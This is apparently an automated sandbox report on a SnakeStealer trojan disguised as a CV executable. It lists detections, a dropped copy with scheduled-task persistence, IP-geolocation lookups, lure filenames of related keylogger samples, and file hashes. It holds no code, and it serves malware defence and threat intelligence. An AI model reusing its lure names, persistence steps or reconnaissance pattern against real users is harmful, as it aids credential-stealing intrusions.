Kayla Dennis CV.exe	30%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeStealer
Kayla Dennis CV.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	30%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeStealer

Source	Detection	Scanner	Label	Link
http://crl.microHy1s.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/155.94.241.187	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.microHy1s.	RegSvcs.exe, 0000000B.00000002.3296169497.0000000006600000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://www.google.com/#q=	Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.dr	false		high
http://reallyfreegeoip.org	RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003090000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003165000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Kayla Dennis CV.exe, 00000000.00000002.2131860326.0000000003421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, lyKbfEsVYfQfU.exe, 0000000C.00000002.2224356364.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.dr	false		high
https://reallyfreegeoip.org/xml/155.94.241.187$	RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	reallyfreegeoip.org	European Union		13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557909
Start date and time:	2024-11-18 18:20:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Kayla Dennis CV.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/15@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 70 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Kayla Dennis CV.exe

Simulations

Behavior and APIs

Time	Type	Description
12:21:10	API Interceptor	2x Sleep call for process: Kayla Dennis CV.exe modified
12:21:17	API Interceptor	32x Sleep call for process: powershell.exe modified
12:21:21	API Interceptor	2x Sleep call for process: lyKbfEsVYfQfU.exe modified
12:21:21	API Interceptor	2871578x Sleep call for process: RegSvcs.exe modified
18:21:18	Task Scheduler	Run new task: lyKbfEsVYfQfU path: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/7pdXjNKP/download
	gusetup.exe	Get hash	malicious	Unknown	Browse	go.glarysoft.com/g/t/releasenotes/cn/10000/s/Glary%20Utilities/v/6.16.0.20
	BlgAsBdkiD.exe	Get hash	malicious	FormBook	Browse	www.vrxlzluy.shop/d8g5/
	Facebook_Advertiser_Position_Description.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
	https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/graylinelaketahoe.com&c=E,1,BWhR2At2OZAdw2Kzdn7d-U-fLZRdgzpdTFbcA87JOQxek-SzsLBqKBG-KMVpA5JovWFRbO4mN3q2zPe1YDaTOG57b4G9v05-IgsJXqrG4om_58_65Os9ldlZ&typo=1	Get hash	malicious	Unknown	Browse	graylinelaketahoe.com/
	View Pdf Doc_a42d45ecadd4b9604949c99fe71e46fe.htm	Get hash	malicious	Unknown	Browse	jssqm.nhgrt.top/WjBkrg/34JSSQm34?&&2yq=bC5zY2FybGF0ZWxsaUBhbG1hdml2YS5pdA%3D%3D
132.226.247.73	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	JOSHHHHHH.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Ziraat#U00a0Bankas#U0131 swift mesaji_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	RFQ for WIKA_pdf.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	Bank Swift Copy 2.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Order88983273293729387293828PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	RFQ for WIKA_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	PROFORMA + PENDENTES.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	PROFORMA + PENDENTES.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PROFORMA + PENDENTES.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	MG-Docu6800001.exe	Get hash	malicious	GuLoader	Browse	172.67.208.107
	payload.vbs	Get hash	malicious	Unknown	Browse	172.67.165.138
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	104.18.10.207
	gP5rh6fa0S.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
UTMEMUS	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	JOSHHHHHH.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	01831899-1 FDMS3008SDC.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PO NO170300999.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	z25Solicituddecotizacion.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PROFORMA + PENDENTES.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3

Process:	C:\Users\user\Desktop\Kayla Dennis CV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1304
Entropy (8bit):	5.342479910699661
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
MD5:	69F4C6D6E1A57244AD636131ED81FDCF
SHA1:	3BC170B8ED30C1968102F43661A91C548A593634
SHA-256:	243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
SHA-512:	07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lyKbfEsVYfQfU.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1304
Entropy (8bit):	5.342479910699661
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
MD5:	69F4C6D6E1A57244AD636131ED81FDCF
SHA1:	3BC170B8ED30C1968102F43661A91C548A593634
SHA-256:	243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
SHA-512:	07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379553825721504
Encrypted:	false
SSDEEP:	48:RWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//YM0Uyus:RLHxvCsIfA2KRHmOug81s
MD5:	3058A289BE7C1A64C6C422AD650511DF
SHA1:	ED7548BBEBF1571110C6EB57DAAB07BE475D0B9F
SHA-256:	B10B58187EDFBC1BD6CABFF49DD739BCEE60107A5BEB1D6943E2C63BC3D460AB
SHA-512:	74E37153F79113C68ACC99ECC2752FB5B7B4E342CF57EF75C15083A6F17F740F41DE1129316A4C564BDFB0B86E1C93C9D9ADC6B770C6B779B8054608ADB0CB2D
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dije5tfe.4l3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbx3wcr4.v1o.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
